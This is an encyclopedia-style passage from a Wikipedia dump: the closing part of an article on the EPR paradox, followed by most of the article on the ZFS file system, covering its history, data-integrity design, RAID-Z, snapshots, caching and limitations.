formalism. If they thought about the problem at all, most working physicists tended to follow Bohr's leadership. So stood the situation for nearly 30 years. Then, in 1964, John Stewart Bell made the groundbreaking discovery that Einstein's local realist world view made experimentally verifiable predictions that would be in conflict with those of quantum mechanics. Bell's discovery shifted the Einstein–Bohr debate from philosophy to the realm of experimental physics. Bell's theorem showed that, for any local realist formalism, there exist limits on the predicted correlations between pairs of particles in an experimental realization of the EPR thought experiment. In 1972, the first experimental tests were carried out. Successive experiments improved the accuracy of observation and closed loopholes. To date, it is virtually certain that local realist theories have been falsified. So Einstein was wrong. But after decades of relative neglect, the EPR paper has been recognized as prescient, since it identified the phenomenon of quantum entanglement. It has several times been the case that Einstein's "mistakes" have foreshadowed and provoked major shifts in scientific research. Such, for instance, has been the case with his proposal of the cosmological constant, which Einstein considered his greatest blunder, but which currently is being actively investigated for its possible role in the accelerating expansion of the universe. In his Princeton years, Einstein was virtually shunned as he pursued the unified field theory. Nowadays, innumerable physicists pursue Einstein's dream for a "theory of everything." The EPR paper did not prove quantum mechanics to be incorrect. What it did prove was that quantum mechanics, with its "spooky action at a distance," is completely incompatible with commonsense understanding. Furthermore, the effect predicted by the EPR paper, quantum entanglement, has inspired approaches to quantum mechanics different from the Copenhagen interpretation, and has been at the forefront of major technological advances in quantum computing, quantum encryption, and quantum information theory. Notes Primary sources References External links NOVA: Inside Einstein's Mind (2015) — Retrace the thought experiments that inspired his theory on the nature of reality. Worldlines in the Einstein's Elevator — Trajectories and worldlines in the Einstein's elevator from the special relativity point of view. Special relativity General relativity Quantum mechanics History of physics Thought experiments in quantum mechanics Theories by Albert Einstein Philosophical arguments
57282698
https://en.wikipedia.org/wiki/ZFS
ZFS
ZFS (previously: Zettabyte file system) combines a file system with a volume manager. It began as part of the Sun Microsystems Solaris operating system in 2001. Large parts of Solaris – including ZFS – were published under an open source license as OpenSolaris for around 5 years from 2005, before being placed under a closed source license when Oracle Corporation acquired Sun in 2009/2010. During 2005 to 2010, the open source version of ZFS was ported to Linux, Mac OS X (continued as MacZFS) and FreeBSD. In 2010, the illumos project forked a recent version of OpenSolaris, to continue its development as an open source project, including ZFS. In 2013, OpenZFS was founded to coordinate the development of open source ZFS. OpenZFS maintains and manages the core ZFS code, while organizations using ZFS maintain the specific code and validation processes required for ZFS to integrate within their systems. OpenZFS is widely used in Unix-like systems. Overview The management of stored data generally involves two aspects: the physical volume management of one or more block storage devices such as hard drives and SD cards and their organization into logical block devices as seen by the operating system (often involving a volume manager, RAID controller, array manager, or suitable device driver), and the management of data and files that are stored on these logical block devices (a file system or other data storage). Example: A RAID array of 2 hard drives and an SSD caching disk is controlled by Intel's RST system, part of the chipset and firmware built into a desktop computer. The Windows user sees this as a single volume, containing an NTFS-formatted drive of their data, and NTFS is not necessarily aware of the manipulations that may be required (such as reading from/writing to the cache drive or rebuilding the RAID array if a disk fails). The management of the individual devices and their presentation as a single device is distinct from the management of the files held on that apparent device. ZFS is unusual because, unlike most other storage systems, it unifies both of these roles and acts as both the volume manager and the file system. Therefore, it has complete knowledge of both the physical disks and volumes (including their condition and status, their logical arrangement into volumes), and also of all the files stored on them. ZFS is designed to ensure (subject to suitable hardware) that data stored on disks cannot be lost due to physical errors or misprocessing by the hardware or operating system, or bit rot events and data corruption which may happen over time, and its complete control of the storage system is used to ensure that every step, whether related to file management or disk management, is verified, confirmed, corrected if needed, and optimized, in a way that storage controller cards and separate volume and file managers cannot achieve. ZFS also includes a mechanism for dataset and pool-level snapshots and replication, including snapshot cloning which is described by the FreeBSD documentation as one of its "most powerful features", having features that "even other file systems with snapshot functionality lack". Very large numbers of snapshots can be taken, without degrading performance, allowing snapshots to be used prior to risky system operations and software changes, or an entire production ("live") file system to be fully snapshotted several times an hour, in order to mitigate data loss due to user error or malicious activity. Snapshots can be rolled back "live" or previous file system states can be viewed, even on very large file systems, leading to savings in comparison to formal backup and restore processes. Snapshots can also be cloned to form new independent file systems. A pool level snapshot (known as a "checkpoint") is available which allows rollback of operations that may affect the entire pool's structure, or which add or remove entire datasets. History Sun Microsystems (to 2010) In 1987, AT&T Corporation and Sun announced that they were collaborating on a project to merge the most popular Unix variants on the market at that time: Berkeley Software Distribution, UNIX System V, and Xenix. This became Unix System V Release 4 (SVR4). The project was released under the name Solaris, which became the successor to SunOS 4 (although SunOS 4.1.x micro releases were retroactively named Solaris 1). ZFS was designed and implemented by a team at Sun led by Jeff Bonwick, Bill Moore and Matthew Ahrens. It was announced on September 14, 2004, but development started in 2001. Source code for ZFS was integrated into the main trunk of Solaris development on October 31, 2005, and released for developers as part of build 27 of OpenSolaris on November 16, 2005. In June 2006, Sun announced that ZFS was included in the mainstream 6/06 update to Solaris 10. Solaris was originally developed as proprietary software, but Sun Microsystems was an early commercial proponent of open source software and in June 2005 released most of the Solaris codebase under the CDDL license and founded the OpenSolaris open-source project. In Solaris 10 6/06 ("U2"), Sun added the ZFS file system and during the next 5 years frequently updated ZFS with new features. ZFS was ported to Linux, Mac OS X (continued as MacZFS) and FreeBSD, under this open source license. The name at one point was said to stand for "Zettabyte File System", but by 2006, the name was no longer considered to be an abbreviation. A ZFS file system can store up to 256 quadrillion zettabytes (ZB). In September 2007, NetApp sued Sun claiming that ZFS infringed some of NetApp's patents on Write Anywhere File Layout. Sun counter-sued in October the same year claiming the opposite. The lawsuits were ended in 2010 with an undisclosed settlement. Later development Ported versions of ZFS began to appear in 2005. After the Sun acquisition by Oracle in 2010, Oracle's version of ZFS became closed source and development of open-source versions proceeded independently, coordinated by OpenZFS from 2013. Features Summary Examples of features specific to ZFS include: Designed for long-term storage of data, and indefinitely scaled datastore sizes with zero data loss, and high configurability. Hierarchical checksumming of all data and metadata, ensuring that the entire storage system can be verified on use, and confirmed to be correctly stored, or remedied if corrupt. Checksums are stored with a block's parent block, rather than with the block itself. This contrasts with many file systems where checksums (if held) are stored with the data so that if the data is lost or corrupt, the checksum is also likely to be lost or incorrect. Can store a user-specified number of copies of data or metadata, or selected types of data, to improve the ability to recover from data corruption of important files and structures. Automatic rollback of recent changes to the file system and data, in some circumstances, in the event of an error or inconsistency. Automated and (usually) silent self-healing of data inconsistencies and write failure when detected, for all errors where the data is capable of reconstruction. Data can be reconstructed using all of the following: error detection and correction checksums stored in each block's parent block; multiple copies of data (including checksums) held on the disk; write intentions logged on the SLOG (ZIL) for writes that should have occurred but did not occur (after a power failure); parity data from RAID/RAID-Z disks and volumes; copies of data from mirrored disks and volumes. Native handling of standard RAID levels and additional ZFS RAID layouts ("RAID-Z"). The RAID-Z levels stripe data across only the disks required, for efficiency (many RAID systems stripe indiscriminately across all devices), and checksumming allows rebuilding of inconsistent or corrupted data to be minimized to those blocks with defects; Native handling of tiered storage and caching devices, which is usually a volume related task. Because ZFS also understands the file system, it can use file-related knowledge to inform, integrate and optimize its tiered storage handling which a separate device cannot; Native handling of snapshots and backup/replication which can be made efficient by integrating the volume and file handling. Relevant tools are provided at a low level and require external scripts and software for utilization. Native data compression and deduplication, although the latter is largely handled in RAM and is memory hungry. Efficient rebuilding of RAID arrays—a RAID controller often has to rebuild an entire disk, but ZFS can combine disk and file knowledge to limit any rebuilding to data which is actually missing or corrupt, greatly speeding up rebuilding; Unaffected by RAID hardware changes which affect many other systems. On many systems, if self-contained RAID hardware such as a RAID card fails, or the data is moved to another RAID system, the file system will lack information that was on the original RAID hardware, which is needed to manage data on the RAID array. This can lead to a total loss of data unless near-identical hardware can be acquired and used as a "stepping stone". Since ZFS manages RAID itself, a ZFS pool can be migrated to other hardware, or the operating system can be reinstalled, and the RAID-Z structures and data will be recognized and immediately accessible by ZFS again. Ability to identify data that would have been found in a cache but has been discarded recently instead; this allows ZFS to reassess its caching decisions in light of later use and facilitates very high cache-hit levels (ZFS cache hit rates are typically over 80%); Alternative caching strategies can be used for data that would otherwise cause delays in data handling. For example, synchronous writes which are capable of slowing down the storage system can be converted to asynchronous writes by being written to a fast separate caching device, known as the SLOG (sometimes called the ZIL – ZFS Intent Log). Highly tunable—many internal parameters can be configured for optimal functionality. Can be used for high availability clusters and computing, although not fully designed for this use. Data integrity One major feature that distinguishes ZFS from other file systems is that it is designed with a focus on data integrity by protecting the user's data on disk against silent data corruption caused by data degradation, power surges (voltage spikes), bugs in disk firmware, phantom writes (the previous write did not make it to disk), misdirected reads/writes (the disk accesses the wrong block), DMA parity errors between the array and server memory or from the driver (since the checksum validates data inside the array), driver errors (data winds up in the wrong buffer inside the kernel), accidental overwrites (such as swapping to a live file system), etc. A 1999 study showed that neither any of the then-major and widespread filesystems (such as UFS, Ext, XFS, JFS, or NTFS), nor hardware RAID (which has some issues with data integrity) provided sufficient protection against data corruption problems. Initial research indicates that ZFS protects data better than earlier efforts. It is also faster than UFS and can be seen as its replacement. Within ZFS, data integrity is achieved by using a Fletcher-based checksum or a SHA-256 hash throughout the file system tree. Each block of data is checksummed and the checksum value is then saved in the pointer to that block—rather than at the actual block itself. Next, the block pointer is checksummed, with the value being saved at its pointer. This checksumming continues all the way up the file system's data hierarchy to the root node, which is also checksummed, thus creating a Merkle tree. In-flight data corruption or phantom reads/writes (the data written/read checksums correctly but is actually wrong) are undetectable by most filesystems as they store the checksum with the data. ZFS stores the checksum of each block in its parent block pointer so the entire pool self-validates. When a block is accessed, regardless of whether it is data or meta-data, its checksum is calculated and compared with the stored checksum value of what it "should" be. If the checksums match, the data are passed up the programming stack to the process that asked for it; if the values do not match, then ZFS can heal the data if the storage pool provides data redundancy (such as with internal mirroring), assuming that the copy of data is undamaged and with matching checksums. It is optionally possible to provide additional in-pool redundancy by specifying (or or more), which means that data will be stored twice (or three times) on the disk, effectively halving (or, for , reducing to one third) the storage capacity of the disk. Additionally some kinds of data used by ZFS to manage the pool are stored multiple times by default for safety, even with the default copies=1 setting. If other copies of the damaged data exist or can be reconstructed from checksums and parity data, ZFS will use a copy of the data (or recreate it via a RAID recovery mechanism), and recalculate the checksum—ideally resulting in the reproduction of the originally expected value. If the data passes this integrity check, the system can then update all faulty copies with known-good data and redundancy will be restored. Consistency of data held in memory, such as cached data in the ARC, is not checked by default, as ZFS is expected to run on enterprise-quality hardware with error correcting RAM, but the capability to check in-memory data exists and can be enabled using "debug flags". RAID ("RAID-Z") For ZFS to be able to guarantee data integrity, it needs multiple copies of the data, usually spread across multiple disks. Typically this is achieved by using either a RAID controller or so-called "soft" RAID (built into a file system). Avoidance of hardware RAID controllers While ZFS can work with hardware RAID devices, ZFS will usually work more efficiently and with greater data protection if it has raw access to all storage devices. ZFS relies on the disk for an honest view to determine the moment data is confirmed as safely written and it has numerous algorithms designed to optimize its use of caching, cache flushing, and disk handling. Disks connected to the system using a hardware, firmware, other "soft" RAID, or any other controller that modifies the ZFS-to-disk I/O path will affect ZFS performance and data integrity. If a third-party device performs caching or presents drives to ZFS as a single system without the low level view ZFS relies upon, there is a much greater chance that the system will perform less optimally and that ZFS will be less likely to prevent failures, recover from failures more slowly, or lose data due to a write failure. For example, if a hardware RAID card is used, ZFS may not be able to: determine the condition of disks; determine if the RAID array is degraded or rebuilding; detect all data corruption; place data optimally across the disks; make selective repairs; control how repairs are balanced with ongoing use; or make repairs that ZFS could usually undertake. The hardware RAID card will interfere with ZFS' algorithms. RAID controllers also usually add controller-dependent data to the drives which prevents software RAID from accessing the user data. In the case of a hardware RAID controller failure, it may be possible to read the data with another compatible controller, but this isn't always possible and a replacement may not be available. Alternate hardware RAID controllers may not understand the original manufacturer's custom data required to manage and restore an array. Unlike most other systems where RAID cards or similar hardware can offload resources and processing to enhance performance and reliability, with ZFS it is strongly recommended that these methods not be used as they typically reduce the system's performance and reliability. If disks must be attached through a RAID or other controller, it is recommended to minimize the amount of processing done in the controller by using a plain HBA (host adapter), a simple fanout card, or configure the card in JBOD mode (i.e. turn off RAID and caching functions), to allow devices to be attached with minimal changes in the ZFS-to-disk I/O pathway. A RAID card in JBOD mode may still interfere if it has a cache or, depending upon its design, may detach drives that do not respond in time (as has been seen with many energy-efficient consumer-grade hard drives), and as such, may require Time-Limited Error Recovery (TLER)/CCTL/ERC-enabled drives to prevent drive dropouts, so not all cards are suitable even with RAID functions disabled. ZFS's approach: RAID-Z and mirroring Instead of hardware RAID, ZFS employs "soft" RAID, offering RAID-Z (parity based like RAID 5 and similar) and disk mirroring (similar to RAID 1). The schemes are highly flexible. RAID-Z is a data/parity distribution scheme like RAID-5, but uses dynamic stripe width: every block is its own RAID stripe, regardless of blocksize, resulting in every RAID-Z write being a full-stripe write. This, when combined with the copy-on-write transactional semantics of ZFS, eliminates the write hole error. RAID-Z is also faster than traditional RAID 5 because it does not need to perform the usual read-modify-write sequence. As all stripes are of different sizes, RAID-Z reconstruction has to traverse the filesystem metadata to determine the actual RAID-Z geometry. This would be impossible if the filesystem and the RAID array were separate products, whereas it becomes feasible when there is an integrated view of the logical and physical structure of the data. Going through the metadata means that ZFS can validate every block against its 256-bit checksum as it goes, whereas traditional RAID products usually cannot do this. In addition to handling whole-disk failures, RAID-Z can also detect and correct silent data corruption, offering "self-healing data": when reading a RAID-Z block, ZFS compares it against its checksum, and if the data disks did not return the right answer, ZFS reads the parity and then figures out which disk returned bad data. Then, it repairs the damaged data and returns good data to the requestor. RAID-Z and mirroring do not require any special hardware: they do not need NVRAM for reliability, and they do not need write buffering for good performance or data protection. With RAID-Z, ZFS provides fast, reliable storage using cheap, commodity disks. There are five different RAID-Z modes: striping (similar to RAID 0, offers no redundancy), RAID-Z1 (similar to RAID 5, allows one disk to fail), RAID-Z2 (similar to RAID 6, allows two disks to fail), RAID-Z3 (a RAID 7 configuration, allows three disks to fail), and mirroring (similar to RAID 1, allows all but one disk to fail). The need for RAID-Z3 arose in the early 2000s as multi-terabyte capacity drives became more common. This increase in capacity—without a corresponding increase in throughput speeds—meant that rebuilding an array due to a failed drive could "easily take weeks or months" to complete. During this time, the older disks in the array will be stressed by the additional workload, which could result in data corruption or drive failure. By increasing parity, RAID-Z3 reduces the chance of data loss by simply increasing redundancy. Resilvering and scrub (array syncing and integrity checking) ZFS has no tool equivalent to fsck (the standard Unix and Linux data checking and repair tool for file systems). Instead, ZFS has a built-in scrub function which regularly examines all data and repairs silent corruption and other problems. Some differences are: fsck must be run on an offline filesystem, which means the filesystem must be unmounted and is not usable while being repaired, while scrub is designed to be used on a mounted, live filesystem, and does not need the ZFS filesystem to be taken offline. fsck usually only checks metadata (such as the journal log) but never checks the data itself. This means, after an fsck, the data might still not match the original data as stored. fsck cannot always validate and repair data when checksums are stored with data (often the case in many file systems), because the checksums may also be corrupted or unreadable. ZFS always stores checksums separately from the data they verify, improving reliability and the ability of scrub to repair the volume. ZFS also stores multiple copies of data—metadata, in particular, may have upwards of 4 or 6 copies (multiple copies per disk and multiple disk mirrors per volume), greatly improving the ability of scrub to detect and repair extensive damage to the volume, compared to fsck. scrub checks everything, including metadata and the data. The effect can be observed by comparing fsck to scrub times—sometimes a fsck on a large RAID completes in a few minutes, which means only the metadata was checked. Traversing all metadata and data on a large RAID takes many hours, which is exactly what scrub does. The official recommendation from Sun/Oracle is to scrub enterprise-level disks once a month, and cheaper commodity disks once a week. Capacity ZFS is a 128-bit file system, so it can address 1.84 × 1019 times more data than 64-bit systems such as Btrfs. The maximum limits of ZFS are designed to be so large that they should never be encountered in practice. For instance, fully populating a single zpool with 2128 bits of data would require 3×1024 TB hard disk drives. Some theoretical limits in ZFS are: 16 exbibytes (264 bytes): maximum size of a single file 248: number of entries in any individual directory 16 exbibytes: maximum size of any attribute 256: number of attributes of a file (actually constrained to 248 for the number of files in a directory) 256 quadrillion zebibytes (2128 bytes): maximum size of any zpool 264: number of devices in any zpool 264: number of file systems in a zpool 264: number of zpools in a system Encryption With Oracle Solaris, the encryption capability in ZFS is embedded into the I/O pipeline. During writes, a block may be compressed, encrypted, checksummed and then deduplicated, in that order. The policy for encryption is set at the dataset level when datasets (file systems or ZVOLs) are created. The wrapping keys provided by the user/administrator can be changed at any time without taking the file system offline. The default behaviour is for the wrapping key to be inherited by any child data sets. The data encryption keys are randomly generated at dataset creation time. Only descendant datasets (snapshots and clones) share data encryption keys. A command to switch to a new data encryption key for the clone or at any time is provided—this does not re-encrypt already existing data, instead utilising an encrypted master-key mechanism. the encryption feature is also fully integrated into OpenZFS 0.8.0 available for Debian and Ubuntu Linux distributions. Read/write efficiency ZFS will automatically allocate data storage across all vdevs in a pool (and all devices in each vdev) in a way that generally maximises the performance of the pool. ZFS will also update its write strategy to take account of new disks added to a pool, when they are added. As a general rule, ZFS allocates writes across vdevs based on the free space in each vdev. This ensures that vdevs which have proportionately less data already, are given more writes when new data is to be stored. This helps to ensure that as the pool becomes more used, the situation does not develop that some vdevs become full, forcing writes to occur on a limited number of devices. It also means that when data is read (and reads are much more frequent than writes in most uses), different parts of the data can be read from as many disks as possible at the same time, giving much higher read performance. Therefore, as a general rule, pools and vdevs should be managed and new storage added, so that the situation does not arise that some vdevs in a pool are almost full and others almost empty, as this will make the pool less efficient. Other features Storage devices, spares, and quotas Pools can have hot spares to compensate for failing disks. When mirroring, block devices can be grouped according to physical chassis, so that the filesystem can continue in the case of the failure of an entire chassis. Storage pool composition is not limited to similar devices, but can consist of ad-hoc, heterogeneous collections of devices, which ZFS seamlessly pools together, subsequently doling out space to as needed. Arbitrary storage device types can be added to existing pools to expand their size. The storage capacity of all vdevs is available to all of the file system instances in the zpool. A quota can be set to limit the amount of space a file system instance can occupy, and a reservation can be set to guarantee that space will be available to a file system instance. Caching mechanisms: ARC, L2ARC, Transaction groups, ZIL, SLOG, Special VDEV ZFS uses different layers of disk cache to speed up read and write operations. Ideally, all data should be stored in RAM, but that is usually too expensive. Therefore, data is automatically cached in a hierarchy to optimize performance versus cost; these are often called "hybrid storage pools". Frequently accessed data will be stored in RAM, and less frequently accessed data can be stored on slower media, such as solid state drives (SSDs). Data that is not often accessed is not cached and left on the slow hard drives. If old data is suddenly read a lot, ZFS will automatically move it to SSDs or to RAM. ZFS caching mechanisms include one each for reads and writes, and in each case, two levels of caching can exist, one in computer memory (RAM) and one on fast storage (usually solid state drives (SSDs)), for a total of four caches. A number of other caches, cache divisions, and queues also exist within ZFS. For example, each VDEV has its own data cache, and the ARC cache is divided between data stored by the user and metadata used by ZFS, with control over the balance between these. Special VDEV Class In OpenZFS 0.8 and later, it is possible to configure a Special VDEV class to preferentially store filesystem metadata, and optionally the Data Deduplication Table (DDT), and small filesystem blocks. This allows, for example, to create a Special VDEV on fast solid-state storage to store the metadata, while the regular file data is stored on spinning disks. This speeds up metadata-intensive operations such as filesystem traversal, scrub, and resilver, without the expense of storing the entire filesystem on solid-state storage. Copy-on-write transactional model ZFS uses a copy-on-write transactional object model. All block pointers within the filesystem contain a 256-bit checksum or 256-bit hash (currently a choice between Fletcher-2, Fletcher-4, or SHA-256) of the target block, which is verified when the block is read. Blocks containing active data are never overwritten in place; instead, a new block is allocated, modified data is written to it, then any metadata blocks referencing it are similarly read, reallocated, and written. To reduce the overhead of this process, multiple updates are grouped into transaction groups, and ZIL (intent log) write cache is used when synchronous write semantics are required. The blocks are arranged in a tree, as are their checksums (see Merkle signature scheme). Snapshots and clones An advantage of copy-on-write is that, when ZFS writes new data, the blocks containing the old data can be retained, allowing a snapshot version of the file system to be maintained. ZFS snapshots are consistent (they reflect the entire data as it existed at a single point in time), and can be created extremely quickly, since all the data composing the snapshot is already stored, with the entire storage pool often snapshotted several times per hour. They are also space efficient, since any unchanged data is shared among the file system and its snapshots. Snapshots are inherently read-only, ensuring they will not be modified after creation, although they should not be relied on as a sole means of backup. Entire snapshots can be restored and also files and directories within snapshots. Writeable snapshots ("clones") can also be created, resulting in two independent file systems that share a set of blocks. As changes are made to any of the clone file systems, new data blocks are created to reflect those changes, but any unchanged blocks continue to be shared, no matter how many clones exist. This is an implementation of the Copy-on-write principle. Sending and receiving snapshots ZFS file systems can be moved to other pools, also on remote hosts over the network, as the send command creates a stream representation of the file system's state. This stream can either describe complete contents of the file system at a given snapshot, or it can be a delta between snapshots. Computing the delta stream is very efficient, and its size depends on the number of blocks changed between the snapshots. This provides an efficient strategy, e.g., for synchronizing offsite backups or high availability mirrors of a pool. Dynamic striping Dynamic striping across all devices to maximize throughput means that as additional devices are added to the zpool, the stripe width automatically expands to include them; thus, all disks in a pool are used, which balances the write load across them. Variable block sizes ZFS uses variable-sized blocks, with 128 KB as the default size. Available features allow the administrator to tune the maximum block size which is used, as certain workloads do not perform well with large blocks. If data compression is enabled, variable block sizes are used. If a block can be compressed to fit into a smaller block size, the smaller size is used on the disk to use less storage and improve IO throughput (though at the cost of increased CPU use for the compression and decompression operations). Lightweight filesystem creation In ZFS, filesystem manipulation within a storage pool is easier than volume manipulation within a traditional filesystem; the time and effort required to create or expand a ZFS filesystem is closer to that of making a new directory than it is to volume manipulation in some other systems. Adaptive endianness Pools and their associated ZFS file systems can be moved between different platform architectures, including systems implementing different byte orders. The ZFS block pointer format stores filesystem metadata in an endian-adaptive way; individual metadata blocks are written with the native byte order of the system writing the block. When reading, if the stored endianness does not match the endianness of the system, the metadata is byte-swapped in memory. This does not affect the stored data; as is usual in POSIX systems, files appear to applications as simple arrays of bytes, so applications creating and reading data remain responsible for doing so in a way independent of the underlying system's endianness. Deduplication Data deduplication capabilities were added to the ZFS source repository at the end of October 2009, and relevant OpenSolaris ZFS development packages have been available since December 3, 2009 (build 128). Effective use of deduplication may require large RAM capacity; recommendations range between 1 and 5 GB of RAM for every TB of storage. An accurate assessment of the memory required for deduplication is made by referring to the number of unique blocks in the pool, and the number of bytes on disk and in RAM ("core") required to store each record—these figures are reported by inbuilt commands such as zpool and zdb. Insufficient physical memory or lack of ZFS cache can result in virtual memory thrashing when using deduplication, which can cause performance to plummet, or result in complete memory starvation. Because deduplication occurs at write-time, it is also very CPU-intensive and this can also significantly slow down a system. Other storage vendors use modified versions of ZFS to achieve very high data compression ratios. Two examples in 2012 were GreenBytes and Tegile. In May 2014, Oracle bought GreenBytes for its ZFS deduplication and replication technology. As described above, deduplication is usually not recommended due to its heavy resource requirements (especially RAM) and impact on performance (especially when writing), other than in specific circumstances where the system and data are well-suited to this space-saving technique. Additional capabilities Explicit I/O priority with deadline scheduling. Claimed globally optimal I/O sorting and aggregation. Multiple independent prefetch streams with automatic length and stride detection. Parallel, constant-time directory operations. End-to-end checksumming, using a kind of "Data Integrity Field", allowing data corruption detection (and recovery if you have redundancy in the pool). A choice of 3 hashes can be used, optimized for speed (fletcher), standardization and security (SHA256) and salted hashes (Skein). Transparent filesystem compression. Supports LZJB, gzip, LZ4 and Zstd. Intelligent scrubbing and resilvering (resyncing). Load and space usage sharing among disks in the pool. Ditto blocks: Configurable data replication per filesystem, with zero, one or two extra copies requested per write for user data, and with that same base number of copies plus one or two for metadata (according to metadata importance). If the pool has several devices, ZFS tries to replicate over different devices. Ditto blocks are primarily an additional protection against corrupted sectors, not against total disk failure. ZFS design (copy-on-write + superblocks) is safe when using disks with write cache enabled, if they honor the write barriers. This feature provides safety and a performance boost compared with some other filesystems. On Solaris, when entire disks are added to a ZFS pool, ZFS automatically enables their write cache. This is not done when ZFS only manages discrete slices of the disk, since it does not know if other slices are managed by non-write-cache safe filesystems, like UFS. The FreeBSD implementation can handle disk flushes for partitions thanks to its GEOM framework, and therefore does not suffer from this limitation. Per-user, per-group, per-project, and per-dataset quota limits. Filesystem encryption since Solaris 11 Express, and OpenZFS (ZoL) 0.8. (on some other systems ZFS can utilize encrypted disks for a similar effect; GELI on FreeBSD can be used this way to create fully encrypted ZFS storage). Pools can be imported in read-only mode. It is possible to recover data by rolling back entire transactions at the time of importing the zpool. ZFS is not a clustered filesystem; however, clustered ZFS is available from third parties. Snapshots can be taken manually or automatically. The older versions of the stored data that they contain can be exposed as full read-only file systems. They can also be exposed as historic versions of files and folders when used with CIFS (also known as SMB, Samba or file shares); this is known as "Previous versions", "VSS shadow copies", or "File history" on Windows, or AFP and "Apple Time Machine" on Apple devices. Disks can be marked as 'spare'. A data pool can be set to automatically and transparently handle disk faults by activating a spare disk and beginning to resilver the data that was on the suspect disk onto it, when needed. Limitations There are several limitations of the ZFS filesystem. Limitations in preventing data corruption The authors of a 2010 study that examined the ability of file systems to detect and prevent data corruption, with particular focus on ZFS, observed that ZFS itself is effective in detecting and correcting data errors on storage devices, but that it assumes data in RAM is "safe", and not prone to error. The study comments that "a single bit flip in memory causes a small but non-negligible percentage of runs to experience a failure, with the probability of committing bad data to disk varying from 0% to 3.6% (according to the workload)", and that when ZFS caches pages or stores copies of metadata in RAM, or holds data in its "dirty" cache for writing to disk, no test is made whether the checksums still match the data at the point of use. Much of this risk can be mitigated in one of two ways: According to the authors, by using ECC RAM; however, the authors considered that adding error detection related to the page cache and heap would allow ZFS to handle certain classes of error more robustly. One of the main architects of ZFS, Matt Ahrens, explains there is an option to enable checksumming of data in memory by using the ZFS_DEBUG_MODIFY flag (zfs_flags=0x10) which addresses these concerns. Other limitations specific to ZFS Capacity expansion is normally achieved by adding groups of disks as a top-level vdev: simple device, RAID-Z, RAID Z2, RAID Z3, or mirrored. Newly written data will dynamically start to use all available vdevs. It is also possible to expand the array by iteratively swapping each drive in the array with a bigger drive and waiting for ZFS to self-heal; the heal time will depend on the amount of stored information, not the disk size. As of Solaris 10 Update 11 and Solaris 11.2, it was neither possible to reduce the number of top-level vdevs in a pool except hot spares, cache, and log devices, nor to otherwise reduce pool capacity. This functionality was said to be in development in 2007. Enhancements to allow reduction of vdevs is under development in OpenZFS. Online shrinking by removing non-redundant top-level vdevs is supported since Solaris 11.4 released in August 2018 and OpenZFS (ZoL) 0.8 released May 2019. it was not possible to add a disk as a column to a RAID Z, RAID Z2 or RAID Z3 vdev. However, a new RAID Z vdev can be created instead and added to the zpool. Some traditional nested RAID configurations, such as RAID 51 (a mirror of RAID 5 groups), are not configurable in ZFS, without some 3rd-party tools. Vdevs can only be composed of raw disks or files, not other vdevs, using the default ZFS management commands. However, a ZFS pool effectively creates a stripe (RAID 0) across its vdevs, so the equivalent of a RAID 50 or RAID 60 is common. Reconfiguring the number of devices in a top-level vdev requires copying data offline, destroying the pool, and recreating the pool with the new top-level vdev configuration, except for adding extra redundancy to an existing mirror, which can be done at any time or if all top level vdevs are mirrors with sufficient redundancy the zpool split command can be used to remove a vdev from each top level vdev in the pool, creating a 2nd pool with identical data. IOPS performance of a ZFS storage pool can suffer if the ZFS raid is not appropriately configured. This applies to all types of RAID, in one way or another. If the zpool consists of only one group of disks configured as, say, eight disks in RAID Z2, then the IOPS performance will be that of a single disk (write speed will be equivalent to 6 disks, but random read speed will be similar to a single disk). However, there are ways to mitigate this IOPS performance problem, for instance add SSDs as L2ARC cache—which can boost IOPS into 100.000s. In short, a zpool should consist of several groups of vdevs, each vdev consisting of 8–12 disks, if using RAID Z. It is not recommended to create a zpool with a single large vdev, say 20 disks, because IOPS performance will be that of a single disk, which also means that resilver time will be very long (possibly weeks with future large drives). Resilver (repair) of a failed disk in a ZFS RAID can take a long time which is not unique to ZFS, it applies to all types of RAID, in one way or another. This means that very large volumes can take several days to repair or to being back to full redundancy after severe data corruption or failure, and during this time a second disk failure may occur, especially as the repair puts additional stress on the system as a whole. In turn this means that configurations that only allow for recovery of a single disk failure, such as RAID Z1 (similar to RAID 5) should be avoided. Therefore, with large disks, one should use RAID Z2 (allow two disks to fail) or RAID Z3 (allow three disks to fail). ZFS RAID differs from conventional RAID by only reconstructing live data and metadata when replacing a disk, not the entirety of the disk including blank and garbage blocks, which means that replacing a member disk on a ZFS pool that is only partially full will take proportionally less time compared to conventional RAID. Data recovery Historically, ZFS has not shipped with tools such as fsck to repair damaged file systems, because the file system itself was designed to self-repair, so long as it had been built with sufficient attention to the design of storage and redundancy of data. If the pool was compromised because of poor hardware, inadequate design or redundancy, or unfortunate mishap, to the point that ZFS was unable to mount the pool, traditionally there were no tools which allowed an end-user to attempt partial salvage of the stored data. This led to threads in online forums where ZFS developers sometimes tried to provide ad-hoc help to home and other small scale users, facing loss of data due to their inadequate design or poor system management. Modern ZFS has improved considerably on this situation over time, and continues to do so: Removal or abrupt failure of caching devices no longer causes pool loss. (At worst, loss of the ZIL may lose very recent transactions, but the ZIL does not usually store more than a few seconds' worth of recent transactions. Loss of the L2ARC cache does not affect data.) If the pool is unmountable, modern versions of ZFS will attempt to identify the most recent consistent point at which the pool which can be recovered, at the cost of losing some of the most recent changes to the contents. Copy on write means that older versions of data, including top-level records and metadata, may still exist even though they are superseded, and if so, the pool can be wound back to a consistent state based on them. The older the data, the more likely it is that at least some blocks have been overwritten and that some data will be irrecoverable, so there is a limit at some point, on the ability of the pool to be wound back. Informally, tools exist to probe the reason why ZFS is unable to mount a pool, and guide the user or a developer as to manual changes required to force the pool to mount. These include using zdb (ZFS debug) to find a valid importable point in the pool, using dtrace or similar to identify the issue causing mount failure, or manually bypassing health checks that cause the mount process to abort, and allow mounting of the damaged pool. , a range of significantly enhanced methods are gradually being rolled out within OpenZFS. These include: Code refactoring, and more detailed diagnostic and debug information on mount failures, to simplify diagnosis and fixing of corrupt pool issues; The ability to trust or distrust the stored pool configuration. This is particularly powerful, as it allows a pool to be mounted even when top-level vdevs are missing or faulty, when top level data is suspect, and also to rewind beyond a pool configuration change if that change was connected to the problem. Once the corrupt pool is mounted, readable files can be copied for safety, and it may turn out that data can be rebuilt even for missing vdevs, by using copies stored elsewhere in the pool. The ability to fix the situation where a disk needed in one pool, was accidentally removed and added to a different pool, causing it to lose metadata related to the first pool, which becomes unreadable. OpenZFS and ZFS Oracle Corporation ceased the public development of both ZFS and OpenSolaris after the acquisition of Sun in 2010. Some developers forked the last public release of OpenSolaris as the Illumos project. Because of the significant advantages present in ZFS, it has been ported to several different platforms with different features and commands. For coordinating the development efforts and to avoid fragmentation, OpenZFS was founded in 2013. According to Matt Ahrens, one of the main 